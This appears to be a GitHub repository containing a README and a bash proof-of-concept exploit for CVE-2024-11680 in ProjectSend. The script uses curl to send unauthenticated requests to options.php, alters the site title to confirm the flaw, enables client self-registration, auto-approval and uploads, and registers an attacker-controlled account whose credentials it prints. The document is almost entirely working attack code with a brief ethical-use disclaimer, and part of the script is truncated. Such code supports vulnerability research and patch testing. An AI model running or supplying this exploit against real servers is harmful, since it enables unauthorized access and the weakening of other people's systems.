├── README.md └── exploit.sh /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2024-11680 PoC Exploit 2 | This repository contains a Proof of Concept (PoC) exploit for CVE-2024-11680, a critical vulnerability in ProjectSend r1605 and older versions. The exploit targets an improper authentication flaw due Privilege Misconfiguration issues. 3 | 4 | ![alt text](https://i.imgur.com/C2F7CFy.png) 5 | 6 | --- 7 | 8 | ## Features 9 | - Exploits improper auth to modify the application title. This is the vulnerability confirmation. 10 | - Enables insecure options (client registration, auto-approval, and file uploads). 11 | - Registers a new user to demonstrate privilege misconfiguration issues. 12 | - Automatically restores the original application title after testing. 13 | 14 | --- 15 | 16 | ## Usage 17 | 18 | ### Prerequisites 19 | 1. A valid target running r1605 or earlier of **ProjectSend**. 20 | 2. curl: This script uses curl to send HTTP requests. 21 | You can check if curl is installed by running: 22 | 23 | ```command -v curl``` 24 | 25 | If it's not installed, you can install it using your package manager. For example, on Ubuntu: 26 | 27 | ```sudo apt-get install curl``` 28 | 29 | 30 | ### Running the Exploit 31 | 1. Clone this repository or download the script. 32 | 2. Run the exploit using the following syntax: 33 | ```./exploit -u TARGET_URL``` 34 | 4. Check the output for the generated username and password for the registered user. 35 | 36 | --- 37 | 38 | ## Disclaimer 39 | This exploit is intended for ethical testing within authorized environments, such as responsible disclosure programs or Vulnerability Disclosure Programs (VDPs). The authors are not responsible for misuse or unauthorized actions taken using this script. 40 | 41 | --- 42 | 43 | ## Author 44 | **D3N14LD15K** 45 | - d3n14ld15k[at]bugcrowdninja[dot]com 46 | -------------------------------------------------------------------------------- /exploit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Exploit: ProjectSend CSRF and Privilege Misconfiguration Exploit PoC 4 | # Description: This exploit is designed to test and confirm a Cross-Site Request Forgery (CSRF) vulnerability in ProjectSend by attempting to modify the host application's title. 5 | # If the vulnerability is present, the script proceeds to exploit privilege misconfigurations to enable insecure options (e.g., client registration, auto-approval, and file uploads) 6 | # and registers a new user with generated credentials. The exploit demonstrates potential impacts by chaining vulnerabilities that could lead to unauthorized actions and data exposure. 7 | # 8 | # Usage: 9 | # - Change the target URL using the `-u` flag to specify the vulnerable application. 10 | # - The script verifies the application's vulnerability by altering its title to "ProjectSendPoC." 11 | # - If the title modification is successful, it restores the original title after testing. 12 | # - It further registers a new user to highlight privilege misconfiguration issues. 13 | # 14 | # NOTE: You must use this exploit inside a folder with write permissions. 15 | # 16 | # Author: D3N14LD15K 17 | # Created: 2024-12-04 18 | # Updated: 2024-12-11 19 | # 20 | # Disclaimer: This script is intended for ethical hacking and educational purposes only. 21 | 22 | TARGET_URL="" 23 | CSRF_TOKEN="" 24 | USERNAME="user$(tr -dc A-Za-z0-9 &2 56 | exit 1 57 | ;; 58 | :) 59 | echo "Option -$OPTARG NOT SET" >&2 60 | exit 1 61 | ;; 62 | esac 63 | done 64 | 65 | if [[ -z "$TARGET_URL" ]]; then 66 | echo "[-] Target URL is required. Use the -u flag." 67 | exit 1 68 | fi 69 | } 70 | 71 | function get_csrf_token_and_title { 72 | echo "[*] Starting vulnerability check on $TARGET_URL..." 73 | RESPONSE=$(curl -s -c cookies.txt "$TARGET_URL/index.php") 74 | CSRF_TOKEN=$(echo "$RESPONSE" | grep -oP 'name="csrf_token" value="\K[^"]+') 75 | ORIGINAL_TITLE=$(echo "$RESPONSE" | grep -oP '.*?»\s+(.*?)' | sed -E 's/<[^>]*>//g' | sed -E 's/&.*?;//g') 76 | 77 | if [[ -z "$CSRF_TOKEN" ]] || [[ -z "$ORIGINAL_TITLE" ]]; then 78 | echo "[-] Failed to retrieve CSRF token. Exploit failed" 79 | exit 1 80 | fi 81 | 82 | } 83 | 84 | function update_title { 85 | local title=$1 86 | RESPONSE=$(curl -s -b cookies.txt -X POST "$TARGET_URL/options.php" \ 87 | -H "Content-Type: application/x-www-form-urlencoded" \ 88 | --data-urlencode "csrf_token=$CSRF_TOKEN" \ 89 | --data-urlencode "section=general" \ 90 | --data-urlencode "this_install_title=$title") 91 | 92 | if echo "$RESPONSE" | grep -q "Internal Server Error"; then 93 | echo "[-] Exploit failed" 94 | exit 1 95 | fi 96 | } 97 | 98 | function verify_title { 99 | local expected_title=$1 100 | RESPONSE=$(curl -s -b cookies.txt "$TARGET_URL/index.php") 101 | CURRENT_TITLE=$(echo "$RESPONSE" | grep -oP '.*?»\s+(.*?)' | sed -E 's/<[^>]*>//g' | sed -E 's/&.*?;//g') 102 | 103 | 104 | if [[ "$CURRENT_TITLE" == *"$expected_title"* ]]; then 105 | echo -e "\e[32m[+] Target is vulnerable \e[0m" 106 | else 107 | echo "[-] Target NOT VULNERABLE" 108 | exit 1 109 | fi 110 | } 111 | 112 | # First things first. Insecure options must be enabled. 113 | function enable_insecure_options { 114 | echo -e "\e[90m[*] Enabling insecure options...\e[0m" 115 | RESPONSE=$(curl -s -b cookies.txt -X POST "$TARGET_URL/options.php" \ 116 | -H "Content-Type: application/x-www-form-urlencoded" \ 117 | --data-urlencode "csrf_token=$CSRF_TOKEN" \ 118 | --data-urlencode "section=clients" \ 119 | --data-urlencode "clients_can_register=1" \ 120 | --data-urlencode "clients_auto_approve=1" \ 121 | --data-urlencode "clients_can_upload=1") 122 | 123 | 124 | if echo "$RESPONSE" | grep -q "Internal Server Error"; then 125 | echo "[-] Failed to enable insecure options" 126 | exit 1 127 | fi 128 | } 129 | 130 | # Function to register a new user 131 | function register_user { 132 | echo -e "\e[90m[*] Registering a new user...\e[0m" 133 | 134 | #New user registration here 135 | RESPONSE=$(curl -s -b cookies.txt -c cookies.txt -L -X POST "$TARGET_URL/register.php" \ 136 | -H "Content-Type: application/x-www-form-urlencoded" \ 137 | --data-urlencode "csrf_token=$CSRF_TOKEN" \ 138 | --data-urlencode "name=$USERNAME" \ 139 | --data-urlencode "username=$USERNAME" \ 140 | --data-urlencode "password=$PASSWORD" \ 141 | --data-urlencode "email=$EMAIL" \ 142 | --data-urlencode "address=123 Fake Street" \ 143 | --data-urlencode "phone=1234567890" \ 144 | --data-urlencode "notify_upload=on") 145 | 146 | if echo "$RESPONSE" | grep -q "alert-danger"; then 147 | echo "[-] Registration failed: $(echo "$RESPONSE" | grep -oP 'alert-danger.*?>\K[^<]+')" 148 | exit 1 149 | elif echo "$RESPONSE" | grep -q "alert-success"; then 150 | echo -e "\e[32m[+] User registered successfully.\e[0m" 151 | echo -e "[+] New username: \e[96m$USERNAME\e[0m" 152 | echo -e "[+] New password: \e[96m$PASSWORD\e[0m" 153 | printf "\r\n" 154 | echo -e "\e[46m\e[30m[+]Try to log in with your new credentials.\e[0m" 155 | printf "\r\n" 156 | else 157 | echo "[-] Unexpected server response during registration" 158 | exit 1 159 | fi 160 | } 161 | 162 | #Main workflow 163 | parse_args "$@" 164 | banner 165 | get_csrf_token_and_title 166 | update_title "$NEW_TITLE" 167 | verify_title "$NEW_TITLE" 168 | update_title "$ORIGINAL_TITLE" 169 | enable_insecure_options 170 | register_user 171 | 172 | # Clean up 173 | rm -f cookies.txt 174 | echo "[+] Exploit completed." 175 | --------------------------------------------------------------------------------